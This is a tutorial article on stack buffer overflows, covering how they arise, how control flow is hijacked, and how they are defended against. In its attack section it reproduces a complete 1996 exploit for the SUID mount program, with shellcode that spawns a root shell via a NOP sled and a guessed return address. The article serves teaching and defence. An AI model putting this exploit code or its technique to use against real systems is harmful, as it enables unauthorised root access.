Over the past decade, buffer overflows have been the most common form of security vulnerability. More seriously, buffer overflow vulnerabilities account for the vast majority of remote network attacks, which allow an anonymous Internet user to gain partial or complete control of a host. Because such an attack lets anyone take over the host, it represents an extremely serious security threat.
Buffer overflow attacks are common because the vulnerabilities themselves are widespread and easy to exploit. They are also the main vehicle for remote attacks because a buffer overflow gives attackers everything they need: the ability to inject attack code and have it executed. The injected code runs with the privileges of the vulnerable program, which lets the attacker take control of the host. This article briefly introduces the basic principles of buffer overflow and the methods for preventing it.
I. Concept and Principle of Buffer Overflow
A buffer is a region of memory where data is stored. A buffer overflow occurs when a program tries to place data into a memory location that does not have enough space for it. An overflow can also be caused deliberately: the attacker writes a string that is longer than the buffer into it. Forcing an overlong string into a buffer of limited size has two possible results. First, the string overwrites adjacent memory, causing the program to fail and, in severe cases, the system to crash. Second, the attacker may be able to execute arbitrary commands and even obtain root privileges on the system.
A buffer is a contiguous block of memory that holds data of a given type while the program is running. Problems arise with dynamically allocated variables: to avoid occupying too much memory, a program decides how much memory to allocate for them only at run time. If the program puts too much data into such a buffer, the buffer overflows. An exploit program uses the overflowing data to place machine code in memory, usually code that yields root permissions. An overflow by itself is not the real danger. However, if the overflowing data reaches a region whose contents are executed with root permissions, the machine is compromised as soon as those instructions run.
Buffer overflows occur because the program does not carefully check the parameters supplied by the user. Consider the following program:
Example1.c
#include <string.h>

void func1(char *input) {
    char buffer[16];
    strcpy(buffer, input);   /* no check that input fits in 16 bytes */
}
The strcpy() call above copies the contents of input directly into buffer. As soon as the input, including its terminating null byte, is longer than 16 bytes, the buffer overflows and the program misbehaves. Other standard functions with the same problem include strcat(), sprintf(), vsprintf(), gets(), and scanf(), as well as getc(), fgetc(), and getchar() when they are called in a loop.
Of course, filling the buffer with arbitrary data only produces a segmentation fault, not an attack. The most common technique is to use the overflow to make the program start a user shell and then run further commands through that shell. If the program is owned by root and has the SUID bit set, the attacker obtains a shell with root permissions and can perform arbitrary operations on the system.
Unless otherwise specified, the rest of this article assumes a Linux system on an Intel x86 CPU. The concepts also apply to other platforms, but the programs must be modified accordingly.
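The missing length check described above can be added in a few lines. The following is only a minimal sketch: copy_checked() and func1_checked() are hypothetical names that do not appear in the original program, and rejecting oversized input (rather than truncating it) is an assumption about the desired behavior.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper, not part of the original example.
 * Copies src into dst only if it fits, including the terminating null byte.
 * Returns 0 on success and -1 if src is too long (dst is then left empty). */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;

    len = strlen(src);
    if (len >= dst_size) {       /* no room for the data plus '\0' */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);   /* len + 1 also copies the '\0' */
    return 0;
}

/* func1() from Example1.c, rewritten to reject oversized input. */
int func1_checked(const char *input)
{
    char buffer[16];

    return copy_checked(buffer, sizeof buffer, input);
}
```

With this version, a 15-character input is accepted and a 16-character input is rejected, because the terminating null byte needs the sixteenth slot.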
II. Creating a Buffer Overflow
In memory, a program is generally divided into a program segment, a data segment, and a stack. The program segment contains the program's machine code and read-only data. The data segment contains the program's static data. Dynamic data is stored on the stack. From low to high memory addresses they are laid out in that order: program segment, data segment, then stack.
When a function is called, the computer first pushes the parameters onto the stack and then saves the contents of the instruction pointer (IP) as the return address (RET). The third item placed on the stack is the base address register (FP); its saved copy is referred to as SFP. The current stack pointer (SP) is then copied into FP as the new base address. Finally, space is reserved for local variables by subtracting an appropriate value from SP. The following program serves as an example:
Example2.c
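#include <string.h>

void func1(char *input) {
    char buffer[16];
    strcpy(buffer, input);    /* copies 256 bytes into a 16-byte buffer */
}

int main(void) {
    char longstring[256];
    int i;
    for (i = 0; i < 255; i++)
        longstring[i] = 'B';
    longstring[255] = '\0';   /* terminate the string so strcpy() stops here */
    func1(longstring);
    return 0;
}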
When func1() is called, the stack looks as follows (lowest address on the left):
    buffer[16] | SFP | RET | *input
Unsurprisingly, running the program produces "Segmentation fault (core dumped)" or a similar error. The 256 bytes starting at buffer are overwritten with the contents of *input, the character 'B', and this covers SFP, RET, and even *input itself. The hexadecimal value of 'B' is 0x42, so the function's return address becomes 0x42424242, which lies outside the program's address space, and a segmentation fault occurs.
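The overwrite of the return address can be reproduced safely in a simulation. The sketch below models the frame of func1() as a plain byte array so that the copy never leaves a single object. The offsets (16 bytes of buffer, 4 bytes of SFP, 4 bytes of RET) assume a 32-bit x86 frame without padding, and simulate_overflow() and the starting return address are hypothetical.

```c
#include <stdint.h>
#include <string.h>

/* Assumed layout of the simulated frame: buffer, then SFP, then RET. */
enum { SIM_BUF_OFF = 0, SIM_SFP_OFF = 16, SIM_RET_OFF = 20, SIM_FRAME_SIZE = 24 };

/* Copies n bytes of input to the start of the simulated frame without
 * checking them against the 16-byte buffer, as strcpy() would not, and
 * returns the value found in the return-address slot afterwards.
 * n is clamped to the frame size only to keep the simulation in bounds. */
uint32_t simulate_overflow(const char *input, size_t n)
{
    unsigned char frame[SIM_FRAME_SIZE];
    uint32_t ret = 0x08048000u;   /* hypothetical legitimate return address */
    uint32_t out;

    memset(frame, 0, sizeof frame);
    memcpy(frame + SIM_RET_OFF, &ret, sizeof ret);

    if (n > SIM_FRAME_SIZE)
        n = SIM_FRAME_SIZE;
    memcpy(frame + SIM_BUF_OFF, input, n);   /* the unchecked copy */

    memcpy(&out, frame + SIM_RET_OFF, sizeof out);
    return out;
}
```

Copying 16 bytes of 'B' leaves the return-address slot untouched, while copying 24 bytes turns it into 0x42424242, since 'B' is 0x42 in ASCII.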
III. Buffer Overflow Attack Methods
A buffer overflow vulnerability can allow an attacker to gain control of a machine, even with the highest privileges. Typically the attack targets a program that runs as root, and most attacks obtain a root shell by executing code similar to "exec(sh)". To achieve this, the attacker has to accomplish two things: place suitable code in the program's address space, and make the program jump to that code with registers and memory suitably initialized.
1. Placing suitable code in the program's address space
Placing suitable code in the program's address space is usually fairly simple. If the code the attacker needs already exists in the target program, the attacker only has to pass it the right parameters and redirect the program to it. For example, suppose the attack needs to execute exec("/bin/sh") and libc contains code that executes exec(arg), where arg is a pointer to a string. The attacker then only has to change the parameter pointer so that it points to "/bin/sh" and jump to the corresponding instruction sequence in libc.
Most of the time, however, this is not possible, and the attacker resorts to a method called "implantation". The attacker feeds the target program a string, which the program stores in a buffer; the string contains a sequence of instructions that can run on the target hardware platform. The buffer can be located anywhere: on the stack (automatic variables), on the heap (dynamically allocated memory), or in the static data area (initialized or uninitialized data). No buffer needs to be overflowed for this step; the attacker only needs enough space to hold the attack code.
2. Transferring control to the attack code
All buffer overflow attacks aim to alter the program's flow of execution so that it jumps to the attack code. The basic approach is to overflow a buffer that has no bounds checking or has some other weakness, which disrupts the program's normal order of execution. By overflowing a buffer, the attacker can overwrite adjacent program state and jump directly to the attack code, bypassing the system's identity checks. In principle, the overflowed buffer can be anywhere in the program's memory. The techniques differ in the kind of program state they target, so there are several ways to transfer control.
(1) Function pointers
In a C program, "void (*foo)()" declares a variable "foo" that is a pointer to a function returning "void". A function pointer can point to any address. The attacker only needs to find an overflowable buffer adjacent to a function pointer, anywhere in memory, and overflow it to change the pointer. When the program later calls a function through that pointer, control flows to wherever the attacker chose.
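To see why the value stored in a function pointer decides where a call goes, consider the minimal sketch below. The names handler_a(), handler_b(), and dispatch() are hypothetical. Here the pointer is reassigned by ordinary code; in an attack the same change is produced by overflowing a neighboring buffer.

```c
/* Two functions with the same signature, so one pointer can target either. */
static int handler_a(void) { return 1; }
static int handler_b(void) { return 2; }

/* Calls through a function pointer and returns the callee's result. */
int dispatch(int use_b)
{
    int (*foo)(void) = handler_a;   /* pointer initially targets handler_a */

    if (use_b)
        foo = handler_b;            /* changing the pointer redirects the call */

    return foo();                   /* the call site itself is unchanged */
}
```

The call site "foo()" is identical in both cases; only the pointer's contents determine which function runs.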
(2) Activation records
Each time a function is called, an activation record is pushed onto the stack; it contains the address to return to when the function finishes. By overflowing an automatic variable, the attacker makes the return address point to the attack code. When the function call ends, the program jumps to the address the attacker set instead of the original one. This kind of overflow is also very common.
(3) longjmp buffers
C provides a simple checkpoint/rollback mechanism called setjmp/longjmp: the program calls "setjmp(buffer)" to set a checkpoint and "longjmp(buffer, value)" to return to it. If the attacker can corrupt the contents of the buffer, the longjmp call effectively becomes a jump to the attack code. Like a function pointer, a longjmp buffer can point anywhere, so the attacker's first task is to find an adjacent buffer that can be overflowed.
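For reference, legitimate use of the checkpoint mechanism looks roughly like the sketch below. The names checkpoint, risky_step(), and run_with_checkpoint() are hypothetical. The jmp_buf stores the saved execution context, which is why corrupting it redirects the jump.

```c
#include <setjmp.h>

static jmp_buf checkpoint;   /* holds the saved execution context */

static void risky_step(int fail)
{
    if (fail)
        longjmp(checkpoint, 1);   /* resume at setjmp(), which now returns 1 */
}

/* Returns 0 if risky_step() completed normally,
 * 1 if execution rolled back to the checkpoint. */
int run_with_checkpoint(int fail)
{
    if (setjmp(checkpoint) != 0)
        return 1;                 /* reached via longjmp() */

    risky_step(fail);
    return 0;
}
```

Calling run_with_checkpoint(0) returns 0, and run_with_checkpoint(1) returns 1 after the rollback.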
3. Combining code implantation and control transfer
The most common buffer overflow attack combines code implantation and activation record corruption in a single string. The attacker locates an overflowable automatic variable and feeds the program a long string that both overflows the buffer to change the activation record and carries the implanted code. (C programmers habitually allocate only a small buffer for user input and parameters.) Code implantation and buffer overflow do not have to happen in one step. The attacker can place the code in one buffer without overflowing it and then overflow a different buffer to redirect the program's pointer. This approach is generally used when the overflowable buffer is too small to hold all of the code. If the attacker wants to use code already resident in the program rather than implanting it, the code usually has to be parameterized first. For example, some code fragments in libc (which nearly every C program links against) execute "exec(something)", where something is a parameter. The attacker uses one buffer overflow to change that parameter and another to point the program pointer at the relevant code fragment in libc.
Security problems caused by programming errors deserve attention, and buffer overflows show clearly how serious they can be.
IV. System Attacks Using Buffer Overflow
If we know that a program has a buffer overflow flaw, how do we find the address of the buffer, and where can we put the shell code? On the platform assumed here, the stack of every program starts at the same fixed address, so in theory the distance between the buffer and the start of the stack can be found by trial and error. However, such blind guessing may take hundreds or thousands of attempts, which is impractical. The solution is to use the no-operation instruction, NOP. Put a long run of NOPs in front of the shell code; the return address can then point anywhere within the run of NOPs. After executing the NOPs, the processor reaches the shell code and starts the shell. This greatly increases the chance of guessing correctly. The following is an example of a buffer overflow attack that exploits a vulnerability in the system program mount:
Example5.c
/* Mount exploit for Linux, Jul 30 1996
   Discovered and coded by bloodmask & vio
   Covin security 1996
*/
/* Header names are missing from the source listing; these are the
   headers the code below requires. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

/* Returns the current stack pointer; the value is left in %eax,
   the x86 return-value register. */
u_long get_esp()
{
    __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff/bin/sh";
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    int i;
    int ofs = DEFAULT_OFFSET;

    buff = malloc(4096);
    if (!buff)
    {
        printf("can't allocate memory\n");
        exit(0);
    }
    ptr = buff;

    /* Fill start of buffer with NOPs */
    memset(ptr, 0x90, BUFFER_SIZE - strlen((char *)execshell));
    ptr += BUFFER_SIZE - strlen((char *)execshell);

    /* Stick ASM code into the buffer */
    for (i = 0; i < strlen((char *)execshell); i++)
        *(ptr++) = execshell[i];

    /* Append the guessed return address twice */
    addr_ptr = (unsigned long *)ptr;
    for (i = 0; i < (8 / 4); i++)
        *(addr_ptr++) = get_esp() + ofs;

    ptr = (char *)addr_ptr;
    *ptr = 0;

    (void)alarm((u_int)0);
    printf("Discovered and coded by Bloodmask and Vio, Covin 1996\n");
    execl(PATH_MOUNT, "mount", buff, NULL);
}
The get_esp() function is used to locate the stack. The program first allocates a temporary buffer, buff, fills its front part with NOPs, and places the shell code after them. The last part holds the address the program should return to, obtained by adding an offset to the stack address. When mount is invoked with buff as its argument, mount's stack overflows: its buffer is overwritten with the contents of buff, and the return address points into the NOPs.
Because mount is owned by root and has the SUID bit set, an ordinary user who runs the program above obtains a shell with root permissions.
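The benefit of the NOP run for guessing can be estimated with simple arithmetic. The sketch below is an illustration under stated assumptions, not part of the original program: the correct address lies somewhere in a window of search_window bytes, each NOP is one byte (0x90 on x86), and guesses are spaced evenly. The function name guesses_needed() is hypothetical.

```c
#include <stddef.h>

/* Worst-case number of evenly spaced guesses needed to land on the
 * NOP run or on the first byte of the code that follows it.
 * The landing zone is sled_len + 1 bytes long, so one guess per zone
 * length is enough to cover the whole window. */
size_t guesses_needed(size_t search_window, size_t sled_len)
{
    size_t zone = sled_len + 1;   /* NOPs plus the exact start address */

    /* Ceiling division without risking overflow in the numerator. */
    return search_window / zone + (search_window % zone != 0);
}
```

Under these assumptions, a 4096-byte window needs up to 4096 guesses with no NOPs, but only 4 guesses with a run of 1023 NOPs.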
V. Protecting Against Buffer Overflow
There are currently four basic ways to protect against buffer overflow attacks and their effects:
1. Enforcing correct code
Writing correct code is worthwhile but time-consuming work, especially for programs written in C, whose idioms (such as null-terminated strings) are error-prone; this style comes from a tradition of pursuing performance at the expense of correctness. Although people have long known how to write secure programs, vulnerable programs keep appearing. Tools and techniques have therefore been developed to help programmers write secure, correct programs. These tools help, but because of the nature of C they cannot find every buffer overflow vulnerability. Error detection therefore reduces the likelihood of buffer overflows but cannot eliminate them. Unless programmers can be sure that their programs are safe, the methods below should also be used to keep the program reliable.
2. Making buffers non-executable through the operating system, so that implanted attack code cannot run
This method stops many buffer overflow attacks, but an attacker does not necessarily have to implant code to carry out a buffer overflow attack, so the method still has many weaknesses.
3. Using compiler bounds checking to protect buffers
This method makes buffer overflows impossible and so eliminates the threat completely, but its cost is relatively high.
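What a bounds check does on every access can be sketched by hand. The struct checked_buf and the function checked_store() below are hypothetical; a bounds-checking compiler would insert the equivalent test automatically, and that test on every access is where the cost comes from.

```c
#include <stddef.h>

/* Hypothetical bounds-checked buffer: the length travels with the data. */
struct checked_buf {
    char  *data;
    size_t len;
};

/* Stores value at index idx.
 * Returns 0 on success and -1 if idx is outside the buffer. */
int checked_store(struct checked_buf *b, size_t idx, char value)
{
    if (b == NULL || b->data == NULL || idx >= b->len)
        return -1;                /* out of range: refuse the write */

    b->data[idx] = value;
    return 0;
}
```

For a 16-byte buffer, indexes 0 through 15 are accepted and index 16 is refused, so no write can reach adjacent memory.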
4. Checking the integrity of program pointers before they are used
Although this method cannot stop every buffer overflow, it does prevent the vast majority of buffer overflow attacks, and attacks that evade it are difficult to carry out.
The most common form of buffer overflow attack corrupts the activation record and implants code on the stack. Many attacks of this type were recorded in 1996. A non-executable stack and stack protection are both effective against it. A non-executable stack defends against every attack that implants code on the stack, and stack protection defends against every attack that alters activation records. The two methods are compatible and can be used together to defend against several kinds of attack at once.
Most of the remaining attacks can be defended against with pointer protection, although some special cases require manual protection. Fully automatic pointer protection requires adding extra bytes to every variable, which makes bounds checking preferable in some situations.
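Stack protection is commonly implemented by placing a known value, often called a canary, between the local buffers and the return address and checking it before the function returns. The sketch below simulates that check on a byte array. The layout, the constant CANARY_VALUE, and the function frame_intact_after_copy() are hypothetical; real implementations typically use a random value chosen per process.

```c
#include <stdint.h>
#include <string.h>

/* Assumed layout of the simulated frame:
 * 16-byte buffer, 4-byte canary, 4-byte return address. */
enum { CF_BUF_OFF = 0, CF_CANARY_OFF = 16, CF_RET_OFF = 20, CF_FRAME_SIZE = 24 };

#define CANARY_VALUE 0x000aff0du   /* hypothetical fixed value for the sketch */

/* Writes n bytes of input into the simulated frame without checking them
 * against the 16-byte buffer, then performs the integrity check that
 * would run before the return address is used.
 * Returns 1 if the canary is intact, 0 if corruption was detected. */
int frame_intact_after_copy(const unsigned char *input, size_t n)
{
    unsigned char frame[CF_FRAME_SIZE];
    uint32_t canary = CANARY_VALUE;
    uint32_t seen;

    memset(frame, 0, sizeof frame);
    memcpy(frame + CF_CANARY_OFF, &canary, sizeof canary);

    if (n > CF_FRAME_SIZE)
        n = CF_FRAME_SIZE;        /* keep the simulation itself in bounds */
    memcpy(frame + CF_BUF_OFF, input, n);

    memcpy(&seen, frame + CF_CANARY_OFF, sizeof seen);
    return seen == canary;
}
```

Because the canary sits between the buffer and the return address, a linear overflow cannot reach the return address without changing the canary first, and the check then fails.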
Most interesting of all, the buffer overflow exploited by the Morris worm uses a technique that today's methods cannot effectively defend against, yet the technique is rarely used because it is too complex.
This article has described and analyzed the principle of buffer overflow and briefly introduced several defenses. Because this is such a common attack technique, research in this area is worthwhile.